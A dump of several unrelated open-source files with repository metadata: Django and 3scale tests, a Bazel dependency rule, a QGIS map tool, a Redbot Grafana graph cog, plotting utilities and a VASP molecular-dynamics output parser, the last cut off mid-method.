Frojd/wagtail-systemtext
|
27579f7b261572a59e48993ae21a44f789f64b0f
|
[
"MIT"
] | 8
|
2017-01-02T19:29:49.000Z
|
2019-01-30T06:31:54.000Z
|
tests/test_template_filters.py
|
Frojd/wagtail-systemtext
|
27579f7b261572a59e48993ae21a44f789f64b0f
|
[
"MIT"
] | 4
|
2016-12-20T11:44:39.000Z
|
2020-08-12T09:10:01.000Z
|
from django.conf import global_settings
from django.template import Context, Template
from django.test import TestCase, modify_settings, override_settings
from wagtailsystemtext.utils import (
set_site, fill_cache, preload, _cleanup,
)
from tests.factories import SiteFactory, PageFactory, SystemStringFactory
@override_settings(
MIDDLEWARE_CLASSES=global_settings.MIDDLEWARE_CLASSES,
TEMPLATES=[{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [
],
'APP_DIRS': True,
'OPTIONS': {
'debug': True,
'context_processors': [
'django.contrib.auth.context_processors.auth',
'django.core.context_processors.debug',
'django.core.context_processors.i18n',
'django.core.context_processors.media',
'django.core.context_processors.static',
'django.core.context_processors.tz',
'django.contrib.messages.context_processors.messages',
'django.core.context_processors.request',
],
},
}],
SITE_ID=1
)
class TemplateFiltersTestCase(TestCase):
def tearDown(self):
_cleanup()
def setUp(self):
site = SiteFactory.create(
root_page=PageFactory.create(title='mypage', path='00010002')
)
SystemStringFactory.create(
identifier='title',
string='Headline!',
site=site,
modified=True,
)
SystemStringFactory.create(
identifier='subtitle',
string='Sub Headline!',
group='sub',
site=site,
modified=True,
)
SystemStringFactory.create(
identifier='new_link',
string='',
site=site,
modified=False,
)
SystemStringFactory.create(
identifier='empty_link',
string='',
site=site,
modified=True,
)
set_site(site)
fill_cache(site)
preload(site)
def test_systemtext_tag(self):
out = Template(
"{% load systemtext %}"
"{% systemtext \"title\" %}"
).render(Context({
}))
self.assertTrue('Headline!' in out)
def test_systemtext_tag(self):
out = Template(
"{% load systemtext %}"
"{% systemtext \"subtitle\" group \"sub\" %}"
).render(Context({
}))
self.assertTrue('Sub Headline!' in out)
def test_systemtext_variable_tag(self):
out = Template(
"{% load systemtext %}"
"{% systemtext title_var group \"sub\" %}"
).render(Context({
'title_var': 'subtitle',
}))
self.assertTrue('Sub Headline!' in out)
def test_systemtext_variable_as_var(self):
out = Template(
"{% load systemtext %}"
"{% systemtext title_var group \"sub\" as my_var %}"
"hello_{{my_var}}"
).render(Context({
'title_var': 'subtitle',
}))
self.assertTrue('hello_Sub Headline!' in out)
def test_systemtext_tag_default(self):
out = Template(
"{% load systemtext %}"
"{% systemtext \"new_link\" default \"Wow!\"%}"
).render(Context({
}))
self.assertTrue('Wow!' in out)
def test_systemtext_tag_empty_no_default(self):
out = Template(
"{% load systemtext %}"
"{% systemtext \"empty_link\" default \"Wow!\"%}"
).render(Context({
}))
self.assertTrue('' in out)
| 27.878788
| 73
| 0.547283
|
d17366ae2f87e56dba79b44d7a7c481fafe3d55d
| 609
|
bzl
|
Python
|
source/bazel/deps/cpp_httplib/get.bzl
|
luxe/unilang
|
6c8a431bf61755f4f0534c6299bd13aaeba4b69e
|
[
"MIT"
] | 33
|
2019-05-30T07:43:32.000Z
|
2021-12-30T13:12:32.000Z
|
source/bazel/deps/cpp_httplib/get.bzl
|
luxe/unilang
|
6c8a431bf61755f4f0534c6299bd13aaeba4b69e
|
[
"MIT"
] | 371
|
2019-05-16T15:23:50.000Z
|
2021-09-04T15:45:27.000Z
|
source/bazel/deps/cpp_httplib/get.bzl
|
luxe/unilang
|
6c8a431bf61755f4f0534c6299bd13aaeba4b69e
|
[
"MIT"
] | 6
|
2019-08-22T17:37:36.000Z
|
2020-11-07T07:15:32.000Z
|
# Do not edit this file directly.
# It was auto-generated by: code/programs/reflexivity/reflexive_refresh
load("@bazel_tools//tools/build_defs/repo:http.bzl", "http_archive")
def cppHttplib():
http_archive(
name="cpp_httplib" ,
build_file="//bazel/deps/cpp_httplib:build.BUILD" ,
sha256="166103fc4281a438e1f5b9611981f2351ab12136086404895fe5d22e5db3aff5" ,
strip_prefix="cpp-httplib-22615f96828a72d84019b748ede01fa11d905977" ,
urls = [
"https://github.com/Unilang/cpp-httplib/archive/22615f96828a72d84019b748ede01fa11d905977.tar.gz",
],
)
| 35.823529
| 109
| 0.71757
|
57ab365f446fbe7edf7d6a69e72c24d384cdb703
| 1,981
|
py
|
Python
|
testsuite/tests/ui/apiap/test_config_version_update_azp_values.py
|
dlaso99/3scale-tests
|
b31a3b3596af6d632b393e383c0417ea56bd95ca
|
[
"Apache-2.0"
] | 5
|
2021-11-04T14:09:24.000Z
|
2021-12-23T13:48:36.000Z
|
testsuite/tests/ui/apiap/test_config_version_update_azp_values.py
|
dlaso99/3scale-tests
|
b31a3b3596af6d632b393e383c0417ea56bd95ca
|
[
"Apache-2.0"
] | 41
|
2021-11-03T14:27:21.000Z
|
2022-03-29T14:46:16.000Z
|
testsuite/tests/ui/apiap/test_config_version_update_azp_values.py
|
dlaso99/3scale-tests
|
b31a3b3596af6d632b393e383c0417ea56bd95ca
|
[
"Apache-2.0"
] | 12
|
2021-11-03T17:28:31.000Z
|
2021-11-30T12:28:25.000Z
|
"""
"https://issues.redhat.com/browse/THREESCALE-6468"
"""
import pytest
from testsuite.ui.views.admin.product.integration.configuration import ProductConfigurationView
from testsuite.ui.views.admin.product.integration.settings import ProductSettingsView
# pylint: disable=unused-argument
@pytest.mark.issue("https://issues.redhat.com/browse/THREESCALE-6468")
def test_config_version(login, service, navigator, threescale, browser, ):
"""
Test:
- Navigates to Product Settings view
- Changes authentication to OpenID, updates Product
- Navigates to Product Configuration
- Assert that there is notification for outdated config
- Assert that promote button is enabled
- Promotes to staging
- Navigates to Product Settings view
- Changes default ClientID value "azp", updates Product
- Assert that the desired value saved to configuration
- Navigates to Product Configuration
- Assert that the promote button is disabled
- Assert that there isn't notification for outdated config
"""
settings = navigator.navigate(ProductSettingsView, product=service)
settings.change_authentication('service_proxy_authentication_method_oidc')
settings = navigator.navigate(ProductConfigurationView, product=service)
assert settings.outdated_config.is_enabled
assert settings.configuration.staging_promote_btn.is_displayed
settings.configuration.staging_promote_btn.click()
settings = navigator.navigate(ProductSettingsView, product=service)
settings.update_client_id('azpza')
settings.update_button.click()
assert settings.client_id.value == 'azpza'
settings = navigator.navigate(ProductConfigurationView, product=service)
assert settings.configuration.staging_promote_btn.is_enabled
assert settings.outdated_config.is_displayed
assert service.proxy.list().configs.latest().entity['content']['proxy']['authentication_method']
| 42.148936
| 100
| 0.759717
|
3bcd6b7c8111cfd644ddfa6a792d4eaae4d1d916
| 2,807
|
py
|
Python
|
rubber.py
|
flexarts/giprouter-qgis-plugin
|
1008753b1183a59cb6f1f99f541c2e3f89438059
|
[
"MIT"
] | null | null | null |
rubber.py
|
flexarts/giprouter-qgis-plugin
|
1008753b1183a59cb6f1f99f541c2e3f89438059
|
[
"MIT"
] | null | null | null |
rubber.py
|
flexarts/giprouter-qgis-plugin
|
1008753b1183a59cb6f1f99f541c2e3f89438059
|
[
"MIT"
] | null | null | null |
from qgis.core import *
from qgis.gui import *
from qgis.PyQt.QtCore import *
from qgis.PyQt.QtGui import *
class RectangleMapTool(QgsMapToolEmitPoint):
onExtentChanged = pyqtSignal(QgsRectangle)
def __init__(self, canvas):
self.canvas = canvas
QgsMapToolEmitPoint.__init__(self, self.canvas)
self.rubberBand = QgsRubberBand(self.canvas, QgsWkbTypes.LineGeometry)
self.rubberBand.setColor(Qt.red)
self.rubberBand.setWidth(1)
self.reset()
def reset(self):
self.startPoint = self.endPoint = None
self.isEmittingPoint = False
self.rubberBand.reset(True)
def canvasPressEvent(self, e):
self.startPoint = self.toMapCoordinates(e.pos())
self.endPoint = self.startPoint
self.isEmittingPoint = True
self.showRect(self.startPoint, self.endPoint)
def canvasReleaseEvent(self, e):
self.isEmittingPoint = False
r = self.rectangle()
if r is not None:
print("Rectangle:", r.xMinimum(), r.yMinimum(), r.xMaximum(), r.yMaximum())
self.onExtentChanged.emit(r)
def canvasMoveEvent(self, e):
if not self.isEmittingPoint:
return
self.endPoint = self.toMapCoordinates(e.pos())
self.showRect(self.startPoint, self.endPoint)
def hideRect(self):
self.reset()
self.rubberBand.reset(QgsWkbTypes.LineGeometry)
def showRect(self, startPoint, endPoint):
self.rubberBand.reset(QgsWkbTypes.LineGeometry)
if startPoint.x() == endPoint.x() or startPoint.y() == endPoint.y():
return
point1 = QgsPointXY(startPoint.x(), startPoint.y())
point2 = QgsPointXY(startPoint.x(), endPoint.y())
point3 = QgsPointXY(endPoint.x(), endPoint.y())
point4 = QgsPointXY(endPoint.x(), startPoint.y())
point5 = QgsPointXY(startPoint.x(), startPoint.y())
self.rubberBand.addPoint(point1, False)
self.rubberBand.addPoint(point2, False)
self.rubberBand.addPoint(point3, False)
self.rubberBand.addPoint(point4, False)
self.rubberBand.addPoint(point5, True) # true to update canvas
self.rubberBand.show()
def rectangle(self):
if self.startPoint is None or self.endPoint is None:
return None
elif self.startPoint.x() == self.endPoint.x() or self.startPoint.y() == self.endPoint.y():
return None
sourceCrs = self.canvas.mapSettings().destinationCrs()
destCrs = QgsCoordinateReferenceSystem(4326)
tr = QgsCoordinateTransform(sourceCrs, destCrs, QgsProject.instance())
p1 = QgsGeometry.fromPointXY(self.startPoint)
p1.transform(tr)
p2 = QgsGeometry.fromPointXY(self.endPoint)
p2.transform(tr)
return QgsRectangle(p1.asPoint(), p2.asPoint())
def deactivate(self):
# Do whatever you want here
QgsMapTool.deactivate(self)
| 33.023529
| 96
| 0.685073
|
ce44d83210d3c0bd730166874852d103eb8dbbd1
| 4,924
|
py
|
Python
|
analysis/utils.py
|
chrrel/extensions
|
1151924b462f9d7516f6b341e4c5300a5a2707af
|
[
"CC-BY-4.0"
] | 1
|
2020-07-08T15:48:48.000Z
|
2020-07-08T15:48:48.000Z
|
analysis/utils.py
|
chrrel/extensions
|
1151924b462f9d7516f6b341e4c5300a5a2707af
|
[
"CC-BY-4.0"
] | 2
|
2020-07-08T15:44:22.000Z
|
2020-07-08T15:44:22.000Z
|
analysis/utils.py
|
chrrel/extensions
|
1151924b462f9d7516f6b341e4c5300a5a2707af
|
[
"CC-BY-4.0"
] | null | null | null |
import csv
import json
import logging
import os
from collections import defaultdict
import matplotlib.pyplot as plt
import tikzplotlib
from pandas import DataFrame
def write_json_file(file_path: str, results):
with open(file_path, "w") as json_file:
json.dump(results, json_file, default=_set_default, indent=4)
def read_json_file(file_path: str):
with open(file_path) as json_file:
data = json.load(json_file)
return data
def _set_default(obj) -> list:
"""Convert sets to list since JSON does not support sets."""
if isinstance(obj, set):
return list(obj)
raise TypeError
def get_tranco_list(file_path: str) -> defaultdict:
tranco = defaultdict(int)
with open(file_path) as f:
for row in csv.reader(f, delimiter=",", skipinitialspace=True):
position = int(row[0])
domain = row[1]
tranco[domain] = position
return tranco
def retrieve_data(file_path: str, cb):
"""
Return data from JSON file at file_path if the file exists. Otherwise execute the callback which returns
the data and writes it to file_path.
"""
if os.path.isfile(file_path):
data = read_json_file(file_path)
else:
data = cb()
write_json_file(file_path, data)
return data
def build_query_strings_from_message_data(extensions: list, table_name: str) -> list:
# Build the needed query strings for every extension
for extension in extensions:
extension["query_strings"] = []
# For every message there will be one query string
for message in extension["messages"]:
logging.debug(json.dumps(message))
query_string = f"SELECT website_id, url, data FROM {table_name}, website WHERE website_id=website.id "
message_dicts = []
message_keys = []
for message_component in message:
if type(message_component) is dict:
# All key/value pairs of known messages
message_dicts.append(message_component)
else:
# components that are no dicts are treated as keys
message_keys.append(message_component)
# Append query options to search for specific key/value pairs in messages, e.g. [{"method": "abc"}]
# --> SELECT website_id, data FROM postmessage WHERE data @> '{"method": "abc"}' ;
for message_dict in message_dicts:
query_string = query_string + f"and data @> '{json.dumps(message_dict)}' "
# Append query options for messages that have the given keys, e.g. 'action' and 'value'
# --> SELECT website_id, data FROM postmessage WHERE data ?& array['action', 'value'] ;
if message_keys:
query_string = query_string + f"and data ?& array{message_keys} "
# Append a ';' at the end to close the query string
query_string = query_string + ";"
extension["query_strings"].append(query_string)
logging.debug(query_string)
return extensions
def draw_stacked_bar_chart(df: DataFrame, labels: list, colors: list, legend_col_count: int, output_path: str):
plt.rcParams["font.family"] = "TeX Gyre Pagella"
plt.figure()
ax = df.plot(kind="barh", stacked=True, width=0.4, color=colors, label=labels)
ax.update({"ylabel": "", "xlabel": ""})
# Set position of the bar and thegraph
ax.set_ylim([-0.4, 1])
plt.gcf().subplots_adjust(bottom=0.45, top=0.65)
# Format xtick labels as percentage
ax.set_xticklabels(['{:,.0%}'.format(x) for x in ax.get_xticks()])
# Hide yaxis and all yticks (needed for tikz)
ax.yaxis.set_visible(False)
ax.set_yticklabels([""])
ax.tick_params(left=False, bottom=False)
ax.grid(axis="x", which='both', alpha=0.6, linestyle=":"),
# Hide the sourrounding box
#plt.box(on=None)
for axis in ['top', 'bottom', 'left', 'right']:
ax.spines[axis].set_linewidth(0.2)
legend = ax.legend(loc="upper center", bbox_transform=plt.gcf().transFigure, labels=labels, ncol=legend_col_count)
legend.get_frame().set_linewidth(0.3)
plt.savefig(f"{output_path}.pdf", bbox_inches="tight")
tikzplotlib.save(
f"{output_path}.tex",
axis_width="320",
extra_axis_parameters=["x grid style={dotted,color=CTsemi}"],
)
plt.close()
def draw_donut_chart(df: DataFrame, output_path: str, legend_labels: list, descriptions: dict):
plt.figure()
df.plot.pie(
figsize=(4, 8),
counterclock=False,
startangle=-270,
autopct="%.2f %%",
pctdistance=0.78,
labels=legend_labels,
textprops={"color": "white", "fontsize": 18},
colors=["#c1e7ff", "#a3cbe5", "#86b0cc", "#6996b3", "#4c7c9b", "#2d6484", "#004c6d"],
)
plt.gcf().gca().legend(
bbox_to_anchor=(1.5, 0.5),
loc="center right",
bbox_transform=plt.gcf().transFigure,
labels=legend_labels
)
plt.gcf().gca().axis('off')
# Add title, labels for axes, etc.
plt.gca().update(descriptions)
# Add a white circle in the middle to create a donut diagram
middle_circle_white = plt.Circle((0, 0), 0.55, color='white')
plt.gcf().gca().add_artist(middle_circle_white)
# Save and close diagram
plt.savefig(output_path, bbox_inches="tight")
o = output_path.replace(".pdf", "")
tikzplotlib.save(
f"{o}.tex",
axis_width="260",
)
plt.close()
| 31.164557
| 115
| 0.710804
|
52e866d563eec61b61a107ce31659aa0d5e7ab8b
| 385
|
py
|
Python
|
project-socialdistribution/accounts/admin.py
|
CMPUT404-2021F/CMPUT404-project-socialdistribution
|
feaf28b75a38a8c474a6a17d8c0134be99fb2479
|
[
"W3C-20150513"
] | null | null | null |
project-socialdistribution/accounts/admin.py
|
CMPUT404-2021F/CMPUT404-project-socialdistribution
|
feaf28b75a38a8c474a6a17d8c0134be99fb2479
|
[
"W3C-20150513"
] | null | null | null |
project-socialdistribution/accounts/admin.py
|
CMPUT404-2021F/CMPUT404-project-socialdistribution
|
feaf28b75a38a8c474a6a17d8c0134be99fb2479
|
[
"W3C-20150513"
] | null | null | null |
from django.contrib import admin
# Register your models here.
from django.contrib.auth.admin import UserAdmin
from .forms import CustomUserCreationForm, CustomUserChangeForm
from .models import CustomUser
class CustomUserAdmin(UserAdmin):
add_form = CustomUserCreationForm
form = CustomUserChangeForm
model = CustomUser
admin.site.register(CustomUser, CustomUserAdmin)
| 27.5
| 63
| 0.815584
|
3bdcc576dba411555e2f9943e100aba6a79cded0
| 9,709
|
py
|
Python
|
grafana/grafana.py
|
Malarne/predacogs
|
350c97468e587827df3ed87237aac6f7baab60de
|
[
"MIT"
] | 38
|
2019-05-13T19:42:31.000Z
|
2022-02-28T10:09:30.000Z
|
grafana/grafana.py
|
Malarne/predacogs
|
350c97468e587827df3ed87237aac6f7baab60de
|
[
"MIT"
] | 39
|
2019-05-26T01:55:26.000Z
|
2022-01-28T15:53:29.000Z
|
grafana/grafana.py
|
Malarne/predacogs
|
350c97468e587827df3ed87237aac6f7baab60de
|
[
"MIT"
] | 50
|
2019-03-27T15:59:36.000Z
|
2022-03-12T09:33:56.000Z
|
import time
from datetime import datetime, timedelta
from io import BytesIO
from typing import Optional
import aiohttp
import discord
from redbot.core import Config, commands
from redbot.core.bot import Red
from redbot.core.commands.converter import TimedeltaConverter
from redbot.core.utils.chat_formatting import box, humanize_list
from tabulate import tabulate
from .utils import Panel, find_panel
class Grafana(commands.Cog):
"""Grafana graphs in your Discord!"""
__author__ = ["Predä", "Fixator10"]
__version__ = "1.0.1"
async def red_delete_data_for_user(self, **kwargs):
"""Nothing to delete."""
return
def __init__(self, bot: Red):
self.bot = bot
self.session = aiohttp.ClientSession()
self.config = Config.get_conf(self, identifier=0xEA016D013C7B488894399820F2BE9874)
self.config.register_global(url="http://localhost:3000", dashboard_id=None, panels={})
def cog_unload(self):
self.bot.loop.create_task(self.session.close())
def format_help_for_context(self, ctx: commands.Context) -> str:
"""Thanks Sinbad!"""
pre_processed = super().format_help_for_context(ctx)
return f"{pre_processed}\n\nAuthors: {', '.join(self.__author__)}\nCog Version: {self.__version__}"
async def fetch_grafana(self, **kwargs):
from_time = kwargs.get("timedelta")
params = {
"orgId": 1,
"from": int((datetime.now() - from_time).timestamp()) * 1000,
"to": int(time.time()) * 1000,
"panelId": kwargs.get("panelid"),
"width": 1000,
"height": 500,
"tz": "UTC",
}
try:
async with self.session.get(
f"{await self.config.url()}/render/d-solo/{await self.config.dashboard_id()}",
params=params,
) as resp:
if resp.status != 200:
return None, {}
return BytesIO(await resp.read()), params
except aiohttp.ClientConnectionError:
return None, {}
@commands.group(invoke_without_command=True)
@commands.cooldown(1, 2, commands.BucketType.user)
@commands.max_concurrency(1, commands.BucketType.guild)
async def graph(
self,
ctx: commands.Context,
from_time: Optional[TimedeltaConverter] = timedelta(days=1),
*,
panel: Panel,
):
"""Render an image of a selected panel of [botname] metrics."""
async with ctx.typing():
file, params = await self.fetch_grafana(panelid=panel.id, timedelta=from_time)
if not file:
return await ctx.send("Failed to fetch Grafana.")
msg = (
f"{await self.config.url()}/d/{await self.config.dashboard_id()}?"
f"panelId={params['panelId']}&fullscreen&orgId={params['orgId']}"
f"&from={params['from']}&to={params['to']}"
)
filename = "&".join([f"{k}={v}" for k, v in params.items()])
return await ctx.send(msg, file=discord.File(file, filename=f"graph-{filename}.png"))
@graph.command(name="list")
async def list_graphs(self, ctx: commands.Context):
"""List all panels that can be used with `[p]graph` command."""
if panels := await self.config.panels():
await ctx.send(box(humanize_list(list(panels.keys()))))
else:
await ctx.send("No panels configured.")
@graph.group(name="set")
@commands.is_owner()
async def set_graphs(self, ctx: commands.Context):
"""Setup grafana cog."""
@set_graphs.command(name="showsettings", aliases=["settings"])
async def graphs_settings(self, ctx: commands.Context):
"""Show current settings."""
config_without_panels = await self.config.all()
del config_without_panels["panels"]
await ctx.send(box(tabulate(config_without_panels.items())))
@set_graphs.command(name="url")
async def grafana_url(self, ctx: commands.Context, *, url: str):
"""Setup url of your Grafana instance.
Default: `http://localhost:3000`"""
if not url.startswith("http"):
url = "http://" + url
url = url.rstrip("/")
async with ctx.typing():
try:
async with self.session.get(f"{url}/api/health") as r:
if r.status != 200:
await ctx.send(f"Incorrect URL. HTTP error returned: {r.status}")
return
try:
if j := await r.json():
if j.get("database") != "ok":
await ctx.send(
"API didnt returned right state of DB, is your Grafana ok?"
)
return
else:
await ctx.send(
"That URL hasn't returned a JSON. Is it a Grafana server?"
)
return
except aiohttp.ContentTypeError:
await ctx.send("That URL hasn't returned a JSON. Is it a Grafana server?")
return
except aiohttp.InvalidURL:
await ctx.send("This is not a valid URL. Check your input and try again.")
return
except aiohttp.ClientConnectorError:
await ctx.send("Server did not respond. Check your input and try again.")
return
await self.config.url.set(url)
await ctx.send(
f"Don't forget to setup dashboard via `{ctx.clean_prefix}graph set dashboard` too.\n"
f"After that you can use `{ctx.clean_prefix}graph set panels import` to import your panels."
)
@set_graphs.command()
async def dashboard(self, ctx: commands.Context, *, did: str):
"""Set dashboard id.
This command needs id from URL.
Example: ```
http://localhost:3000/d/AbCdEf0G/dashboard
^ here ^
```"""
try:
async with self.session.get(
f"{await self.config.url()}/api/dashboards/uid/{did}"
) as r:
try:
rj = await r.json()
except aiohttp.ContentTypeError:
rj = {}
if r.status != 200:
await ctx.send(
"Unable to found provided dashboard: "
f"{rj.get('message') or 'Unknown error, did you set up an url?'}"
)
return
except aiohttp.ClientConnectorError:
await ctx.send("Server did not respond. Make sure that URL setting is set correctly.")
return
await self.config.dashboard_id.set(did)
await ctx.send(
f"Make sure that you setup URL via `{ctx.clean_prefix}graph set url`.\n"
f"After that you can use `{ctx.clean_prefix}graph set panels import` to import your panels."
)
@set_graphs.group()
async def panels(self, ctx: commands.Context):
"""Setup graphs on dashboard."""
@panels.command(name="import")
@commands.max_concurrency(1)
async def graphs_import(self, ctx: commands.Context):
"""Automatically import all graphs from dashboard, overwriting already saved."""
try:
async with self.session.get(
f"{await self.config.url()}/api/dashboards/uid/{await self.config.dashboard_id()}",
raise_for_status=True,
) as r:
r = await r.json()
await self.config.panels.set(
{
p["title"].casefold().replace(" ", "_") or f"panel_{p['id']}": p["id"]
for p in r["dashboard"]["panels"]
if p["type"] != "row"
}
)
await ctx.tick()
except aiohttp.ClientResponseError as e:
await ctx.send(
f"Unable to import graphs, are URL and dashboard ID set?\n{e.status}: {e.message}"
)
except aiohttp.ClientConnectorError:
await ctx.send(f"Unable to import graphs, are URL and dashboard ID set?")
@panels.command(name="remove")
async def graphs_remove(self, ctx: commands.Context, *, panel: Panel):
"""Remove certain graph from list."""
async with self.config.panels() as panels:
del panels[panel.name]
await ctx.tick()
@panels.command(name="add")
async def graphs_add(self, ctx: commands.Context, pid: int, *, name: str):
"""Add certain graph to list manually."""
try:
async with self.session.get(
f"{await self.config.url()}/api/dashboards/uid/{await self.config.dashboard_id()}",
raise_for_status=True,
) as r:
r = await r.json()
if not await find_panel(r["dashboard"]["panels"], pid):
await ctx.send("This panel is not found on current set dashboard.")
return
except aiohttp.ClientResponseError as e:
await ctx.send(
f"Unable to import graphs, are URL and dashboard ID set?\n{e.status}: {e.message}"
)
except aiohttp.ClientConnectorError:
await ctx.send(f"Unable to import graphs, are URL and dashboard ID set?")
async with self.config.panels() as panels:
panels[name.casefold().replace(" ", "_")] = pid
await ctx.tick()
| 41.139831
| 107
| 0.554846
|
c3e8f8abdf0f49c8b21f5dba32ff584f7938d78e
| 10,855
|
py
|
Python
|
pymatflow/elk/post/md.py
|
DeqiTang/pymatflow
|
bd8776feb40ecef0e6704ee898d9f42ded3b0186
|
[
"MIT"
] | 6
|
2020-03-06T16:13:08.000Z
|
2022-03-09T07:53:34.000Z
|
pymatflow/exciting/post/md.py
|
DeqiTang/pymatflow
|
bd8776feb40ecef0e6704ee898d9f42ded3b0186
|
[
"MIT"
] | 1
|
2021-10-02T02:23:08.000Z
|
2021-11-08T13:29:37.000Z
|
pymatflow/elk/post/md.py
|
DeqiTang/pymatflow
|
bd8776feb40ecef0e6704ee898d9f42ded3b0186
|
[
"MIT"
] | 1
|
2021-07-10T16:28:14.000Z
|
2021-07-10T16:28:14.000Z
|
#!/usr/bin/env python
# _*_ coding: utf-8 _*_
import os
import sys
import datetime
import subprocess
import matplotlib.pyplot as plt
from pymatflow.vasp.base.xyz import Atom
class md_post:
"""
Note:
md_post can extract information for the molecular dynamics running,
it will printout the trajectory file(xyz format).
"""
def __init__(self, output="OUTCAR"):
"""
output:
the output file of md run.
relaxed:
whether the structure successfully relaxed.
"""
self.file = output
self.electronic_params = {}
self.ionic_params = {}
self.run_info = {}
self.job_done = None # whether calculation has finished
#self.cell = None # optimized cell
self.trajectory = None
with open(self.file, 'r') as fout:
self.lines = fout.readlines()
self.get_info()
def get_info(self):
"""
get the general information of opt run from opt run output file
which is now stored in self.lines
"""
# check whether calculation is finished
if len(self.lines[-1].split()) == 4 and self.lines[-1].split()[0] == "Voluntary" and self.lines[-1].split()[1] == "context":
self.job_done = True
else:
self.job_done = False
#
self.get_trajectory()
self.get_opt_params_and_run_info()
def get_trajectory(self):
self.trajectory = []
for i in range(len(self.lines)):
if len(self.lines[i].split()) > 0 and self.lines[i].split()[0] == "POSITION" and self.lines[i].split()[1] == "TOTAL-FORCE":
atm = []
j = i + 2
while len(self.lines[j].split()) == 6:
atm.append(Atom("x", float(self.lines[j].split()[0]), float(self.lines[j].split()[1]), float(self.lines[j].split()[2])))
j = j + 1
self.trajectory.append(atm)
#
def get_opt_params_and_run_info(self):
"""
run_info["iterations"]: scf iterations per scf step
run_info["total-energies"]: total energies of every scf step
run_info["fermi-energies"]: fermi energies of every scf step
run_info["total-forces-rms"]: total RMS forces of every scf step
"""
self.run_info["iterations"] = []
self.run_info["total-energies"] = []
self.run_info["fermi-energies"] = []
self.run_info["total-forces-rms"] = []
for line in self.lines:
# if it is an empty line continue to next line
if len(line.split()) == 0:
continue
if line.split()[0] == "executed" and line.split()[1] == "on" and line.split()[3] == "date":
self.run_info["start-time"] = line.split("\n")[0]
#if line.split()[0] == "This" and line.split()[1] == "run" and line.split()[3] == "terminated":
# self.run_info["stop-time"] = line.split("\n")[0]
if len(line.split()) == 4 and line.split()[1] == "Iteration":
self.run_info["iterations"].append(line)
if line.split()[0] == "energy" and line.split()[1] == "without" and line.split()[2] == "entropy=":
self.run_info["total-energies"].append(float(line.split()[3]))
if line.split()[0] == "E-fermi" and line.split()[1] == ":":
self.run_info["fermi-energies"].append(float(line.split()[2]))
if line.split()[0] == "FORCES:" and line.split()[1] == "max":
self.run_info["total-forces-rms"].append(float(line.split()[5]))
if line.split()[0] == "ENCUT" and line.split()[1] == "=":
self.electronic_params["ENCUT"] = float(line.split()[2])
if line.split()[0] == "EDIFF" and line.split()[1] == "=":
self.electronic_params["EDIFF"] = float(line.split()[2])
if line.split()[0] == "LREAL" and line.split()[1] == "=":
self.electronic_params["LREAL"] = line.split()[2]
if line.split()[0] == "EDIFFG" and line.split()[1] == "=":
self.ionic_params["EDIFFG"] = float(line.split()[2])
if line.split()[0] == "NSW" and line.split()[1] == "=":
self.ionic_params["NSW"] = int(line.split()[2])
if line.split()[0] == "IBRION" and line.split()[1] == "=":
self.ionic_params["IBRION"] = int(line.split()[2])
if line.split()[0] == "NFREE" and line.split()[1] == "=":
self.ionic_params["NFREE"] = int(line.split()[2])
if line.split()[0] == "ISIF" and line.split()[1] == "=":
self.ionic_params["ISIF"] = int(line.split()[2])
if line.split()[0] == "POTIM" and line.split()[1] == "=":
self.ionic_params["POTIM"] = float(line.split()[2])
if line.split()[0] == "TEIN" and line.split()[1] == "=":
self.ionic_params["TEIN"] = float(line.split()[2])
if line.split()[0] == "TEBEG" and line.split()[1] == "=":
self.ionic_params["TEBEG"] = float(line.split()[2].split(";")[0])
if line.split()[0] == "SMASS" and line.split()[1] == "=":
self.ionic_params["SMASS"] = float(line.split()[2])
if line.split()[0] == "PSTRESS=":
self.ionic_params["PSTRESS"] = float(line.split()[1])
#self.run_info["scf-cycles"] = len(self.run_info["iterations"])
#if self.run_type == "relax":
# self.run_info["ion-steps"] = len(self.run_info["iterations"]) - 1
#elif self.run_type == "vc-relax":
# self.run_info["ion-steps"] = len(self.run_info["iterations"]) - 2
def print_trajectory(self, xyz="trajectory.xyz"):
with open(xyz, 'w') as fout:
for i in range(len(self.trajectory)):
fout.write("%d\n" % len(self.trajectory[i]))
fout.write("i = %d\n" % i)
for atom in self.trajectory[i]:
fout.write("%s\t%.9f\t%.9f\t%.9f\n" % (atom.name, atom.x, atom.y, atom.z))
def view_trajectory(self, trajfile="trajectory.xyz"):
#os.system("xcrysden --xyz %s" % trajfile)
subprocess.call(["xcrysden", "--xyz", trajfile])
def plot_run_info(self):
"""
"""
#plt.plot(self.run_info["iterations"])
#plt.title("Iterations per SCF")
#plt.xlabel("Scf cycles")
#plt.ylabel("iterations")
#plt.tight_layout()
#plt.savefig("iterations-per-scf.png")
#plt.close()
plt.plot(self.run_info["total-energies"])
plt.title("Total energies per SCF")
plt.xlabel("Scf cycles")
plt.ylabel("Total Energies (eV)")
plt.tight_layout()
plt.savefig("total-energies-per-scf.png")
plt.close()
plt.plot(self.run_info["fermi-energies"])
plt.title("Fermi energies per SCF")
plt.xlabel("Scf cycles")
plt.ylabel("Fermi energies (eV)")
plt.tight_layout()
plt.savefig("fermi-energies-per-scf.png")
plt.close()
plt.plot(self.run_info["total-forces-rms"])
plt.title("Total forces(RMS) per SCF")
plt.xlabel("Scf cycles")
plt.ylabel("Total forces (eV/Angst)")
plt.tight_layout()
plt.savefig("total-forces-rms-per-scf.png")
plt.close()
def markdown_report(self, md="MolecularDynamicsReport.md"):
"""
when writing Chinese to a file you must specify
encoding='utf-8' when open the file for writing
"""
with open(md, 'w', encoding='utf-8') as fout:
fout.write("# 分子动力学实验统计\n")
fout.write("任务是否结束:%s\n" % str(self.job_done))
fout.write("## 离子步参数\n")
for item in self.ionic_params:
fout.write("- %s: %s\n" % (item, str(self.ionic_params[item])))
fout.write("## 电子步参数\n")
for item in self.electronic_params:
fout.write("- %s: %s\n" % (item, str(self.electronic_params[item])))
fout.write("## 运行信息\n")
# calculate the running time and print it out
# Importante: the length of the time string might be different, depending
# on the value of hours and minutes and seconds. if they are two digits
# number, they will be divided like: '11: 6: 2', only when they all are
# two digtis number, they will not be divided '11:16:12'
# so we have to preprocess it to build the right time string to pass into
# datetime.datetime.strptime()
start_str = self.run_info["start-time"].split()[4]+"-"+self.run_info["start-time"].split()[5]
if self.job_done == True:
#stop_str = self.run_info["stop-time"].split()[8]+"-"+self.run_info["stop-time"].split()[5]+self.run_info["stop-time"].split()[6]+self.run_info["stop-time"].split()[7]
pass
start = datetime.datetime.strptime(start_str, "%Y.%m.%d-%H:%M:%S")
#if self.job_done == True:
# stop = datetime.datetime.strptime(stop_str, "%d%b%Y-%H:%M:%S")
